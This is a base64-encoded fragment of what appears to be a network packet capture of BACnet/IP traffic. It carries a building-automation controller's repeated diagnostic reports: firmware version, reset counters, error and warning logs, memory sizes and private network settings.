gUFJHcyBydW5uaW5nLg0KDQpNb2R1bGUgc3RhdHVzOg0KRmlybXdhcmUgc2VjdGlvbnMgaW4gZmxhc2ggbWVtb3J5DQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KICBNRS1MR1ItdmFuaWxsYSAgIC0gdjYuMDA6MDgyICAgQXVnIDI5IDIwMTMNCg0KUmVzZXQgY291bnRlcnM6DQogICAgIDAgUG93ZXIgZmFpbHVyZXMNCiAgICAgMCBCcm93bm91dHMNCiAgICAgMSBDb21tYW5kZWQgYm9vdHMNCiAgICAgMSBTeXN0ZW0gZXJyb3JzDQogICAgIDAgV2F0Y2hkb2cgdGltZW91dHMNCg0KU3lzD7AWjl4WTAIAQQAAAEEAAAAAAAAAAAAAAADgySCqAFJUABI1QAgARQAAMwChQACAEaHFrBgAFKwYAA+6wLrAAB9YhIEKABcBBAIEDQbEAoAAAw4yAcoiAcoPsBaOXt6aAgAHAgAABwIAAAAAAAAAAAAAUlQAEjVAAODJIKoACABFAAH5AWAAAEARH0GsGAAPrBgAFLrAusAB5SfUgQoB3QEAMA0GEA4yAcpl/gHKdGVtIGVycm9yIG1lc3NhZ2UgaGlzdG9yeTogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFR5cGUgICBTcGVjaWZpYw0KICBFRVBST006IFdyaXRlIGVycm9yIGFjY2Vzc2luZyBkZXZpY2UgMHhBICAxMi8zMS83OSAwMDowMDowMCAwMDAxNDAwNyAwMDAwMDA3Mg0KV2FybmluZyBtZXNzYWdlIGhpc3Rvcnk6DQogIEFSQ0g6IEZhaWxlZCB0byByZXN0b3JlIGZyb20gYXJjaGl2ZS4gICAgIC0tLy0tLy0tIC0tOi0tOi0tDQogIFBSRyBkYXRhYmFzZSBjb3JydXB0IG9uIHN0YXJ0dXAuICAgICAgICAgIC0tLy0tLy0tIC0tOi0tOi0tDQogIEhhcmR3YXJlIGNsb2NrIHJlYWQgZXJyb3IgMTQwMDIgICAgICAgICAgIC0tLy0tLy0tIC0tOi0tOi0tDQogIEhhcmR3YXJlIGNsb2NrIHdyaXRlIGVycm9yIDE0MDA3ICAgICAgICAgIDEyLzMxLzc5IDAwOjAwOjAwDQogIEFSQ05FVDogSW52YWxpZCBhZGQPsBaOXlmyAgBBAAAAQQAAAAAAAAAAAAAAAODJIKoAUlQAEjVACABFAAAzAKJAAIARocSsGAAUrBgAD7rAusAAH1iEgQoAFwEEAgQOBsQCgAADDjIDlCIByg+wFo5e4/4CAAcCAAAHAgAAAAAAAAAAAABSVAASNUAA4MkgqgAIAEUAAfkCIgAAQBEef6wYAA+sGAAUusC6wAHlFMSBCgHdAQAwDgYQDjIDlGX+AcpyZXNzIHNlbGVjdGlvbi4gICAgICAgIDEyLzMxLzc5IDAwOjAwOjAwDQpJbmZvcm1hdGlvbiBtZXNzYWdlIGhpc3Rvcnk6DQogIE1vZHVsZSBmb3JtYXR0ZWQuIFBSRyBkYXRhYmFzZSBjbGVhcmVkLiAgIC0tLy0tLy0tIC0tOi0tOi0tDQogIFBvc3NpYmxlIGJhdHRlcnkgZmFpbHVyZS4gICAgICAgICAgICAgICAgIC0tLy0tLy0tIC0tOi0tOi0tDQogIENsb2NrIGNoYW5nZWQgZnJvbSAxMi8zMS83OSAwMDowMDowMCB0byAgIDA0LzA4LzIwIDE3OjIxOjE4DQogIE1vZHVsZSBmb3JtYXR0ZWQuIFBSRyBkYXRhYmFzZSBjbGVhcmVkLiAgIC0tLy0tLy0tIC0tOi0tOi0tDQogIFJlc2V0IGNvdW50ZXJzIGNsZWFyZWQuICAgICAgICAgICAgICAgICAgIC0tLy0tLy0tIC0tOi0tOi0tDQogIE1lc3NhZ2UgbG9nIGNsZWFyZWQuICAgICAgICAgICAgICAgICAgICAgIC0tLy0tLy0tIC0tOi0tOi0tDQoNCkFSQzE1Ng+wFo5eXSIDAEEAAABBAAAAAAAAAAAAAAAA4MkgqgBSVAASNUAIAEUAADMAo0AAgBGhw6wYABSsGAAPusC6wAAfWISBCgAXAQQCBA8GxAKAAAMOMgVeIgHKD7AWjl5VbAMABwIAAAcCAAAAAAAAAAAAAFJUABI1QADgySCqAAgARQAB+QJLAABAER5WrBgAD6wYABS6wLrAAeWu1YEKAd0BADAPBhAOMgVeZf4ByiByZWNvbmZpZ3VyYXRpb25zIGR1cmluZyB0aGUgbGFzdCBob3VyIChjbGVhcmVkIHVwb24gcmVzZXQpOg0KICBUb3RhbCAuLi4uLi4uLi4uLi4uLi4uLi4uLi4uLiAwDQogIEluaXRpYXRlZCBieSB0aGlzIG5vZGUgLi4uLi4uIDANCg0KQ29yZSBib2FyZCBoYXJkd2FyZTogDQogIENvcmUgRUVQUk9NIGludmFsaWQsIGNhbm5vdCByZXBvcnQgaGFyZHdhcmUgZGV0YWlscy4NCkJhc2UgYm9hcmQgaGFyZHdhcmU6IA0KICBCYXNlIEVFUFJPTSBpbnZhbGlkLCBjYW5ub3QgcmVwb3J0IGhhcmR3YXJlIGRldGFpbHMuDQoNCkZyZWUgaGVhcCBzcGFjZSA9IDYyOTc5Mi4NCg0KRGF0YWJhc2Ugc2l6ZSA9IDEyNTQ5ODQyICwgdXNlZCA9IDI4NDMyMiwgZnJlZSA9IDEyMjY1NTIwLg0KDQpGbGFzaCBzdG9yYWdlIHNpemUgPSAyODUwODE2DQogIEFyY2hpdmUgc3RvcmFnZSBzaXplID0gMA0KICBGaWxlIHN0b3JhZ2UgD7AWjl7TjgMAQQAAAEEAAAAAAAAAAAAAAADgySCqAFJUABI1QAgARQAAMwCkQACAEaHCrBgAFKwYAA+6wLrAAB9YhIEKABcBBAIEEAbEAoAAAw4yBygiAYoPsBaOXrPkAwDHAQAAxwEAAAAAAAAAAAAAUlQAEjVAAODJIKoACABFAAG5A5cAAEARHUqsGAAPrBgAFLrAusABpZ7QgQoBnQEAMBAGEQ4yByhl/gGKc2l6ZSA9IDAgKG1heCA9IDI4NTA4MTYpLCB1c2VkID0gMCwgZnJlZSA9IDANCg0KUmF3IHBoeXNpY2FsIHN3aXRjaGVzID0gRkZGRkZGRkYgRkZGRkZGRkYNCg0KTmV0d29yayBJbmZvcm1hdGlvbjoNCiAgRXRoZXJuZXQgTUFDIGFkZHJlc3MgID0gMDAtRTAtQzktMjAtQUEtMDANCiAgQ3VycmVudCBJUCBBZGRyZXNzICAgID0gMTcyLjI0LjAuMTUNCiAgQ3VycmVudCBTdWJuZXQgTWFzayAgID0gMjU1LjI1NS4wLjANCiAgQ3VycmVudCBHYXRld2F5IEFkZHIgID0gMTcyLjI0LjAuMjANCiAgQXNzaWduZWQgSVAgQWRkcmVzcyAgID0gMTcyLjI0LjAuMTUNCiAgQXNzaWduZWQgU3VibmV0IE1hc2sgID0gMjU1LjI1NS4wLjANCiAgQXNzaWduZWQgR2F0ZXdheSBBZGRyID0gMTcyLjI0LjAuMjANCg+1Fo5eeOUHAD8AAAA/AAAAAAAAAAAAAAAA4MkgqgBSVAASNUAIAEUAADEApUAAgBGhw6wYABSsGAAPusC6wAAdWIKBCgAVAQQCBBEGxAKAAAMOMQAhAQ+1Fo5eF6gIADoAAAA6AAAAAAAAAAAAAABSVAASNUAA4MkgqgAIAEUAACwDKAAAQBEfRqwYAA+sGAAUusC6wAAYOgyBCgAQAQAwEQYQDjEAYTEPtRaOXkwACQA7AAAAOwAAAAAAAAAAAAAAAODJIKoAUlQAEjVACABFAAAtAKZAAIARocasGAAUrBgAD7rAusAAGVh+gQoAEQEEAgQSDAwCgAADGSq1Fo5epEcJAD8AAAA/AAAAAAAAAAAAAABSVAASNUAA4MkgqgAIAEUAADECjQAAQBEf3KwYAA+sGAAUusC6wAAd0h+BCgAVAQAwEgwMAoAAAxkqPiIIsj+1Fo5ew4oJAEAAAABAAAAAAAAAAAAAAAAA4MkgqgBSVAASNUAIAEUAADIAp0AAgBGhwKwYABSsGAAPusC6wAAeWIOBCgAWAQQCBBMGxAKAAAMOMQAiAcoPtRaOXu+tCgAGAgAABgIAAAAAAAAAAAAAUlQAEjVAAODJIKoACABFAAH4AAoAAEARIJisGAAPrBgAFLrAusAB5CEugQoB3AEAMBMGEA4xAGX+AcoxMi8zMS8xOTc5ICAwMDowMDowMCAgICAgICAgIENNOiA2NTUzNQ0KDQpEZXZpY2UgSW5zdGFuY2U6IFVuY29uZmlndXJlZA0KDQpEb3dubG9hZGVkIGJ5OiBVbmtub3duDQoNCkZsYXNoIEFyY2hpdmUgU3RhdHVzOiBVbnN1cHBvcnRlZA0KDQowIFBSR3MgaW5pdGlhbGl6ZWQuICAwIFBSR3MgcnVubmluZy4NCg0KTW9kdWxlIHN0YXR1czoNCkZpcm13YXJlIHNlY3Rpb25zIGluIGZsYXNoIG1lbW9yeQ0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCiAgTUUtTEdSLXZhbmlsbGEgICAtIHY2LjAwOjA4MiAgIEF1ZyAyOSAyMDEzDQoNClJlc2V0IGNvdW50ZXJzOg0KICAgICAwIFBvd2VyIGZhaWx1cmVzDQogICAgIDAgQnJvd25vdXRzDQogICAgIDEgQ29tbWFuZGVkIGJvb3RzDQogICAgIDEgU3lzdGVtIGVycm9ycw0KICAgICAwIFdhdGNoZG9nIHRpbWVvdXRzDQoNClN5cw+1Fo5et7sKAEEAAABBAAAAAAAAAAAAAAAA4MkgqgBSVAASNUAIAEUAADMAqEAAgBGhvqwYABSsGAAPusC6wAAfWISBCgAXAQQCBBQGxAKAAAMOMgHKIgHKD7UWjl5YFAsABwIAAAcCAAAAAAAAAAAAAFJUABI1QADgySCqAAgARQAB+QBVAABAESBMrBgAD6wYABS6wLrAAeUnzYEKAd0BADAUBhAOMgHKZf4BynRlbSBlcnJvciBtZXNzYWdlIGhpc3Rvcnk6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUeXBlICAgU3BlY2lmaWMNCiAgRUVQUk9NOiBXcml0ZSBlcnJvciBhY2Nlc3NpbmcgZGV2aWNlIDB4QSAgMTIvMzEvNzkgMDA6MDA6MDAgMDAwMTQwMDcgMDAwMDAwNzINCldhcm5pbmcgbWVzc2FnZSBoaXN0b3J5Og0KICBBUkNIOiBGYWlsZWQgdG8gcmVzdG9yZSBmcm9tIGFyY2hpdmUuICAgICAtLS8tLS8tLSAtLTotLTotLQ0KICBQUkcgZGF0YWJhc2UgY29ycnVwdCBvbiBzdGFydHVwLiAgICAgICAgICAtLS8tLS8tLSAtLTotLTotLQ0KICBIYXJkd2FyZSBjbG9jayByZWFkIGVycm9yIDE0MDAyICAgICAgICAgICAtLS8tLS8tLSAtLTotLTotLQ0KICBIYXJkd2FyZSBjbG9jayB3cml0ZSBlcnJvciAxNDAwNyAgICAgICAgICAxMi8zMS83OSAwMDowMDowMA0KICBBUkNORVQ6IEludmFsaWQgYWRkD7UWjl5RUQsAQQAAAEEAAAAAAAAAAAAAAADgySCqAFJUABI1QAgARQAAMwCpQACAEaG9rBgAFKwYAA+6wLrAAB9YhIEKABcBBAIEFQbEAoAAAw4yA5QiAcoPtRaOXlOcCwAHAgAABwIAAAAAAAAAAAAAUlQAEjVAAODJIKoACABFAAH5AuEAAEARHcCsGAAPrBgAFLrAusAB5RS9gQoB3QEAMBUGEA4yA5Rl/gHKcmVzcyBzZWxlY3Rpb24uICAgICAgICAxMi8zMS83OSAwMDowMDowMA0KSW5mb3JtYXRpb24gbWVzc2FnZSBoaXN0b3J5Og0KICBNb2R1bGUgZm9ybWF0dGVkLiBQUkcgZGF0YWJhc2UgY2xlYXJlZC4gICAtLS8tLS8tLSAtLTotLTotLQ0KICBQb3NzaWJsZSBiYXR0ZXJ5IGZhaWx1cmUuICAgICAgICAgICAgICAgICAtLS8tLS8tLSAtLTotLTotLQ0KICBDbG9jayBjaGFuZ2VkIGZyb20gMTIvMzEvNzkgMDA6MDA6MDAgdG8gICAwNC8wOC8yMCAxNzoyMToxOA0KICBNb2R1bGUgZm9ybWF0dGVkLiBQUkcgZGF0YWJhc2UgY2xlYXJlZC4gICAtLS8tLS8tLSAtLTotLTotLQ0KICBSZXNldCBjb3VudGVycyBjbGVhcmVkLiAgICAgICAgICAgICAgICAgICAtLS8tLS8tLSAtLTotLTotLQ0KICBNZXNzYWdlIGxvZyBjbGVhcmVkLiAgICAgICAgICAgICAgICAgICAgICAtLS8tLS8tLSAtLTotLTotLQ0KDQpBUkMxNTYPtRaOXorHCwBBAAAAQQAAAAAAAAAAAAAAAODJIKoAUlQAEjVACABFAAAzAKpAAIARobysGAAUrBgAD7rAusAAH1iEgQoAFwEEAgQWBsQCgAADDjIFXiIByg+1Fo5enwkMAAcCAAAHAgAAAAAAAAAAAABSVAASNUAA4MkgqgAIAEUAAfkC4QAAQBEdwKwYAA+sGAAUusC6wAHlrs6BCgHdAQAwFgYQDjIFXmX+AcogcmVjb25maWd1cmF0aW9ucyBkdXJpbmcgdGhlIGxhc3QgaG91ciAoY2xlYXJlZCB1cG9uIHJlc2V0KToNCiAgVG90YWwgLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4gMA0KICBJbml0aWF0ZWQgYnkgdGhpcyBub2RlIC4uLi4uLiAwDQoNCkNvcmUgYm9hcmQgaGFyZHdhcmU6IA0KICBDb3JlIEVFUFJPTSBpbnZhbGlkLCBjYW5ub3QgcmVwb3J0IGhhcmR3YXJlIGRldGFpbHMuDQpCYXNlIGJvYXJkIGhhcmR3YXJlOiANCiAgQmFzZSBFRVBST00gaW52YWxpZCwgY2Fubm90IHJlcG9ydCBoYXJkd2FyZSBkZXRhaWxzLg0KDQpGcmVlIGhlYXAgc3BhY2UgPSA2Mjk3OTIuDQoNCkRhdGFiYXNlIHNpemUgPSAxMjU0OTg0MiAsIHVzZWQgPSAyODQzMjIsIGZyZWUgPSAxMjI2NTUyMC4NCg0KRmxhc2ggc3RvcmFnZSBzaXplID0gMjg1MDgxNg0KICBBcmNoaXZlIHN0b3JhZ2Ugc2l6ZSA9IDANCiAgRmlsZSBzdG9yYWdlIA+1Fo5ebiYMAEEAAABBAAAAAAAAAAAAAAAA4MkgqgBSVAASNUAIAEUAADMAq0AAgBGhu6wYABSsGAAPusC6wAAfWISBCgAXAQQCBBcGxAKAAAMOMgcoIgGKD7UWjl5VfwwAxwEAAMcBAAAAAAAAAAAAAFJUABI1QADgySCqAAgARQABuQGWAABAER9LrBgAD6wYABS6wLrAAaWeyYEKAZ0BADAXBhEOMgcoZf4BinNpemUgPSAwIChtYXggPSAyODUwODE2KSwgdXNlZCA9IDAsIGZyZWUgPSAwDQoNClJhdyBwaHlzaWNhbCBzd2l0Y2hlcyA9IEZGRkZGRkZGIEZGRkZGRkZGDQoNCk5ldHdvcmsgSW5mb3JtYXRpb246DQogIEV0aGVybmV0IE1BQyBhZGRyZXNzICA9IDAwLUUwLUM5LTIwLUFBLTAwDQogIEN1cnJlbnQgSVAgQWRkcmVzcyAgICA9IDE3Mi4yNC4wLjE1DQogIEN1cnJlbnQgU3VibmV0IE1hc2sgICA9IDI1NS4yNTUuMC4wDQogIEN1cnJlbnQgR2F0ZXdheSBBZGRyICA9IDE3Mi4yNC4wLjIwDQogIEFzc2lnbmVkIElQIEFkZHJlc3MgICA9IDE3Mi4yNC4wLjE1DQogIEFzc2lnbmVkIFN1Ym5ldCBNYXNrICA9IDI1NS4yNTUuMC4wDQogIEFzc2lnbmVkIEdhdGV3YXkgQWRkciA9IDE3Mi4yNC4wLjIwDQoPuRaOXiQcCgA8AAAAPAAAAAAAAAAAAAAAAODJIKoAUlQAEjVACABFAAAuAKxAAIARob+sGAAUrBgAD7rAusAAGlh/gQoAEgEAEAmkeAQIA7QWFxMAxBaOXrt6BAA8AAAAPAAAAAAAAAAAAAAAAODJIKoAUlQAEjVACABFAAAuAK1AAIARob6sGAAUrBgAD7rAusAAGlh/gQoAEgEAEAakeAQIA7QSFxwNyhaOXn/eBwA8AAAAPAAAAAAAAAAAAAAAAODJIKoAUlQAEjVACABFAAAuAK5AAIARob2sGAAUrBgAD7rAusAAGlh/gQoAEgEAEAmkeAQIA7QWFyEAzxaOXmK0CAA/AAAAPwAAAAAAAAAAAAAAAODJIKoAUlQAEjVACABFAAAxAK8AAIAR4bmsGAAUrBgAD7rAusAAHViCgQoAFQEEAgQYBsQCgAADDjEAIQEPzxaOXjaYCQA6AAAAOgAAAAAAAAAAAAAAUlQAEjVAAODJIKoACABFAAAsAncAAEARH/esGAAPrBgAFLrAusAAGDsFgQoAEAEAMBgGEA4xAGEwD88Wjl7qrQkAOwAAADsAAAAAAAAAAAAAAADgySCqAFJUABI1QAgARQAALQCwAACAEeG8rBgAFKwYAA+6wLrAABlYfoEKABEBBAIEGQwMAoAAAxkqzxaOXtkJCgA/AAAAPwAAAAAAAAAAAAAAUlQAEjVAAODJIKoACABFAAAxA/cAAEARHnKsGAAPrBgAFLrAusAAHdAggQoAFQEAMBkMDAKAAAMZKj4iCqo/zxaOXtmeCgBAAAAAQAAAAAAAAAAAAAAAAODJIKoAUlQAEjVACABFAAAyALEAAIAR4basGAAUrBgAD7rAusAAHliDgQoAFgEEAgQaBsQCgAADDjEAIgHKD88Wjl4oiAsABgIAAAYCAAAAAAAAAAAAAFJUABI1QADgySCqAAgARQAB+AFkAABAER8+rBgAD6wYABS6wLrAAeQuKIEKAdwBADAaBhAOMQBl/gHKMDEvMDEvMTk3MCAgMDA6MDA6MDAgICAgICAgICBDTTogNjU1MzUNCg0KRGV2aWNlIEluc3RhbmNlOiBVbmNvbmZpZ3VyZWQNCg0KRG93bmxvYWRlZCBieTogVW5rbm93bg0KDQpGbGFzaCBBcmNoaXZlIFN0YXR1czogVW5zdXBwb3J0ZWQNCg0KMCBQUkdzIGluaXRpYWxpemVkLiAgMCBQUkdzIHJ1bm5pbmcuDQoNCk1vZHVsZSBzdGF0dXM6DQpGaXJtd2FyZSBzZWN0aW9ucyBpbiBmbGFzaCBtZW1vcnkNCj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQogIE1FLUxHUi12YW5pbGxhICAgLSB2Ni4wMDowODIgICBBdWcgMjkgMjAxMw0KDQpSZXNldCBjb3VudGVyczoNCiAgICAgMCBQb3dlciBmYWlsdXJlcw0KICAgICAwIEJyb3dub3V0cw0KICAgICAxIENvbW1hbmRlZCBib290cw0KICAgICAxIFN5c3RlbSBlcnJvcnMNCiAgICAgMCBXYXRjaGRvZyB0aW1lb3V0cw0KDQpTeXMPzxaOXkHnCwBBAAAAQQAAAAAAAAAAAAAAAODJIKoAUlQAEjVACABFAAAzALIAAIAR4bSsGAAUrBgAD7rAusAAH1iEgQoAFwEEAgQbBsQCgAADDjIByiIByg/PFo5ezioMAAcCAAAHAgAAAAAAAAAAAABSVAASNUAA4MkgqgAIAEUAAfkA7wAAQBEfsqwYAA+sGAAUusC6wAHlipKBCgHdAQAwGwYQDjIBymX+Acp0ZW0gZXJyb3IgbWVzc2FnZSBoaXN0b3J5OiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHlwZSAgIFNwZWNpZmljDQogIEVFUFJPTTogV3JpdGUgZXJyb3IgYWNjZXNzaW5nIGRldmljZSAweEEgIDEyLzMxLzc5IDAwOjAwOjAwIDAwMDE0MDA3IDAwMDAwMDcyDQpXYXJuaW5nIG1lc3NhZ2UgaGlzdG9yeToNCiAgU1BJOiBUcmFuc2ZlciBDb21wbGV0ZSB0aW1lb3V0IGVycm9yLiAgICAgMDQvMDgvMjAgMTc6MjM6MzMNCiAgU1BJOiBUcmFuc2ZlciBDb21wbGV0ZSB0aW1lb3V0IGVycm9yLiAgICAgMDQvMDgvMjAgMTc6MjM6MzMNCiAgU1BJOiBUcmFuc2ZlciBDb21wbGV0ZSB0aW1lb3V0IGVycm9yLiAgICAgMDQvMDgvMjAgMTc6MjM6MzMNCiAgU1BJOiBUcmFuc2ZlciBDb21wbGV0ZSB0aW1lb3V0IGVycm9yLiAgICAgMDQvMDgvMjAgMTc6MjM6MzMNCiAgSGFyZHdhcmUgY2xvY2sgd3JpdA/PFo5eg2UMAEEAAABBAAAAAAAAAAAAAAAA4MkgqgBSVAASNUAIAEUAADMAswAAgBHhs6wYABSsGAAPusC6wAAfWISBCgAXAQQCBBwGxAKAAAMOMgOUIgHKD88Wjl4IpgwABwIAAAcCAAAAAAAAAAAAAFJUABI1QADgySCqAAgARQAB+QJpAABAER44rBgAD6wYABS6wLrAAeX8BoEKAd0BADAcBhAOMgOUZf4BymUgZXJyb3IgMTQwMDcgICAgICAgICAgMDQvMDgvMjAgMTg6MjM6MjgNCiAgQVJDSDogRmFpbGVkIHRvIHJlc3RvcmUgZnJvbSBhcmNoaXZlLiAgICAgLS0vLS0vLS0gLS06LS06LS0NCiAgUFJHIGRhdGFiYXNlIGNvcnJ1cHQgb24gc3RhcnR1cC4gICAgICAgICAgLS0vLS0vLS0gLS06LS06LS0NCiAgSGFyZHdhcmUgY2xvY2sgcmVhZCBlcnJvciAxNDAwMiAgICAgICAgICAgLS0vLS0vLS0gLS06LS06LS0NCiAgSGFyZHdhcmUgY2xvY2sgd3JpdGUgZXJyb3IgMTQwMDcgICAgICAgICAgMTIvMzEvNzkgMDA6MDA6MDANCiAgQVJDTkVUOiBJbnZhbGlkIGFkZHJlc3Mgc2VsZWN0aW9uLiAgICAgICAgMTIvMzEvNzkgMDA6MDA6MDANCkluZm9ybWF0aW9uIG1lc3NhZ2UgaGlzdG9yeToNCiAgQ2xvY2sgY2hhbmdlZCBmcm9tIDA0LzA4LzIwIDE4OjIzOjI4IHRvICAgMDQvMDgvMjAgMTc6MjM6MzMNCiAgQ2xvY2sgD88Wjl6xxgwAQQAAAEEAAAAAAAAAAAAAAADgySCqAFJUABI1QAgARQAAMwC0AACAEeGyrBgAFKwYAA+6wLrAAB9YhIEKABcBBAIEHQbEAoAAAw4yBV4iAcoPzxaOXtf2DAAHAgAABwIAAAAAAAAAAAAAUlQAEjVAAODJIKoACABFAAH5AUwAAEARH1WsGAAPrBgAFLrAusAB5Y2ygQoB3QEAMB0GEA4yBV5l/gHKY2hhbmdlZCBmcm9tIDA0LzA4LzIwIDE3OjIzOjE5IHRvICAgMDQvMDgvMjAgMTg6MjM6MjgNCiAgQ2xvY2sgY2hhbmdlZCBmcm9tIDEyLzMxLzc5IDAwOjAwOjAwIHRvICAgMDQvMDgvMjAgMTc6MjM6MTkNCiAgTW9kdWxlIGZvcm1hdHRlZC4gUFJHIGRhdGFiYXNlIGNsZWFyZWQuICAgLS0vLS0vLS0gLS06LS06LS0NCiAgUG9zc2libGUgYmF0dGVyeSBmYWlsdXJlLiAgICAgICAgICAgICAgICAgLS0vLS0vLS0gLS06LS06LS0NCiAgQ2xvY2sgY2hhbmdlZCBmcm9tIDEyLzMxLzc5IDAwOjAwOjAwIHRvICAgMDQvMDgvMjAgMTc6MjE6MTgNCiAgTW9kdWxlIGZvcm1hdHRlZC4gUFJHIGRhdGFiYXNlIGNsZWFyZWQuICAgLS0vLS0vLS0gLS06LS06LS0NCiAgUmVzZXQgY291bnRlcnMgY2xlYXJlZC4gICAgICAgICAgICAgICAgICAgLS0vLS0vLS0gLS06LS06LS0NCiAgTWVzc2FnZSBsb2cgY2xlYXJlZC4gICAPzxaOXpsjDQBBAAAAQQAAAAAAAAAAAAAAAODJIKoAUlQAEjVACABFAAAzALUAAIAR4bGsGAAUrBgAD7rAusAAH1iEgQoAFwEEAgQeBsQCgAADDjIHKCIByg/PFo5eoFMNAAcCAAAHAgAAAAAAAAAAAABSVAASNUAA4MkgqgAIAEUAAfkAFgAAQBEgi6wYAA+sGAAUusC6wAHlPlyBCgHdAQAwHgYQDjIHKGX+AcogICAgICAgICAgICAgICAgICAgLS0vLS0vLS0gLS06LS06LS0NCg0KQVJDMTU2IHJlY29uZmlndXJhdGlvbnMgZHVyaW5nIHRoZSBsYXN0IGhvdXIgKGNsZWFyZWQgdXBvbiByZXNldCk6DQogIFRvdGFsIC4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uIDANCiAgSW5pdGlhdGVkIGJ5IHRoaXMgbm9kZSAuLi4uLi4gMA0KDQpDb3JlIGJvYXJkIGhhcmR3YXJlOiANCiAgQ29yZSBFRVBST00gaW52YWxpZCwgY2Fubm90IHJlcG9ydCBoYXJkd2FyZSBkZXRhaWxzLg0KQmFzZSBib2FyZCBoYXJkd2FyZTogDQogIEJhc2UgRUVQUk9NIGludmFsaWQsIGNhbm5vdCByZXBvcnQgaGFyZHdhcmUgZGV0YWlscy4NCg0KRnJlZSBoZWFwIHNwYWNlID0gNjI5NzkyLg0KDQpEYXRhYmFzZSBzaXplID0gMTI1NDk4NDIgLCB1c2VkID0gMjg0MzIyLCBmcmVlID0gMTIyNjU1MjAuDQoNCkZsYXNoIHN0b3JhZ2Ugc2l6ZSA9IDI4NTA4MQ/PFo5ebHgNAEEAAABBAAAAAAAAAAAAAAAA4MkgqgBSVAASNUAIAEUAADMAtgAAgBHhsKwYABSsGAAPusC6wAAfWISBCgAXAQQCBB8GxAKAAAMOMgjyIgG4D88Wjl6ttg0A9QEAAPUBAAAAAAAAAAAAAFJUABI1QADgySCqAAgARQAB5wPmAABAERzNrBgAD6wYABS6wLrAAdN9WIEKAcsBADAfBhEOMgjyZf4BuDYNCiAgQXJjaGl2ZSBzdG9yYWdlIHNpemUgPSAwDQogIEZpbGUgc3RvcmFnZSBzaXplID0gMCAobWF4ID0gMjg1MDgxNiksIHVzZWQgPSAwLCBmcmVlID0gMA0KDQpSYXcgcGh5c2ljYWwgc3dpdGNoZXMgPSBGRkZGRkZGRiBGRkZGRkZGRg0KDQpOZXR3b3JrIEluZm9ybWF0aW9uOg0KICBFdGhlcm5ldCBNQUMgYWRkcmVzcyAgPSAwMC1FMC1DOS0yMC1BQS0wMA0KICBDdXJyZW50IElQIEFkZHJlc3MgICAgPSAxNzIuMjQuMC4xNQ0KICBDdXJyZW50IFN1Ym5ldCBNYXNrICAgPSAyNTUuMjU1LjAuMA0KICBDdXJyZW50IEdhdGV3YXkgQWRkciAgPSAxNzIuMjQuMC4yMA0KICBBc3NpZ25lZCBJUCBBZGRyZXNzICAgPSAxNzIuMjQuMC4xNQ0KICBBc3NpZ25lZCBTdWJuZXQgTWFzayAgPSAyNTUuMjU1LjAuMA0KICBBc3NpZ25lZCBHYXRld2F5IEFkZHIgPSAxNzIuMjQuMC4yMA0KD9UWjl79+ggAKgAAACoAAAAAAAAAAAAAAADgySCqAFJUABI1QAgGAAEIAAYEAAFSVAASNUCsGAAUAODJIKoArBgAD9UWjl61AgkAKgAAACoAAAAAAAAAAAAAAFJUABI1QADgySCqAAgGAAEIAAYEAAIA4MkgqgCsGAAPUlQAEjVArBgAFNsWjl4aMg0APwAAAD8AAAAAAAAAAAAAAADgySCqAFJUABI1QAgARQAAMQC3QACAEaGxrBgAFKwYAA+6wLrAAB1YgoEKABUBBAIEIAbEAoAAAw4xACEBD9sWjl5NGQ4AOgAAADoAAAAAAAAAAAAAAFJUABI1QADgySCqAAgARQAALAI5AABAESA1rBgAD6wYABS6wLrAABg6/YEKABABADAgBhAOMQBhMA/bFo5erCcOADsAAAA7AAAAAAAAAAAAAAAA4MkgqgBSVAASNUAIAEUAAC0AuEAAgBGhtKwYABSsGAAPusC6wAAZWH6BCgARAQQCBCEMDAKAAAMZKtsWjl6kYw4APwAAAD8AAAAAAAAAAAAAAFJUABI1QADgySCqAAgARQAAMQMGAABAER9jrBgAD6wYABS6wLrAAB3QGIEKABUBADAhDAwCgAADGSo+IgqqP9sWjl5bxA4AQAAAAEAAAAAAAAAAAAAAAADgySCqAFJUABI1QAgARQAAMgC5QACAEaGurBgAFKwYAA+6wLrAAB5Yg4EKABYBBAIEIgbEAoAAAw4xACIByg/cFo5ekD4AAAYCAAAGAgAAAAAAAAAAAABSVAASNUAA4MkgqgAIAEUAAfgAmwAAQBEgB6wYAA+sGAAUusC6wAHkLiCBCgHcAQAwIgYQDjEAZf4ByjAxLzAxLzE5NzAgIDAwOjAwOjAwICAgICAgICAgQ006IDY1NTM1DQoNCkRldmljZSBJbnN0YW5jZTogVW5jb25maWd1cmVkDQoNCkRvd25sb2FkZWQgYnk6IFVua25vd24NCg0KRmxhc2ggQXJjaGl2ZSBTdGF0dXM6IFVuc3VwcG9ydGVkDQoNCjAgUFJHcyBpbml0aWFsaXplZC4gIDAgUFJHcyBydW5uaW5nLg0KDQpNb2R1bGUgc3RhdHVzOg0KRmlybXdhcmUgc2VjdGlvbnMgaW4gZmxhc2ggbWVtb3J5DQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KICBNRS1MR1ItdmFuaWxsYSAgIC0gdjYuMDA6MDgyICAgQXVnIDI5IDIwMTMNCg0KUmVzZXQgY291bnRlcnM6DQogICAgIDAgUG93ZXIgZmFpbHVyZXMNCiAgICAgMCBCcm93bm91dHMNCiAgICAgMSBDb21tYW5kZWQgYm9vdHMNCiAgICAgMSBTeXN0ZW0gZXJyb3JzDQogICAgIDAgV2F0Y2hkb2cgdGltZW91dHMNCg0KU3lzD9wWjl5eSgAAQQAAAEEAAAAAAAAAAAAAAADgySCqAFJUABI1QAgARQAAMwC6QACAEaGsrBgAFKwYAA+6wLrAAB9YhIEKABcBBAIEIwbEAoAAAw4yAcoiAcoP3BaOXhjEAAAHAgAABwIAAAAAAAAAAAAAUlQAEjVAAODJIKoACABFAAH5A1kAAEARHUisGAAPrBgAFLrAusAB5RyTgQoB3QEAMCMGEA4yAcpl/gHKdGVtIGVycm9yIG1lc3NhZ2UgaGlzdG9yeTogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFR5cGUgICBTcGVjaWZpYw0KICBF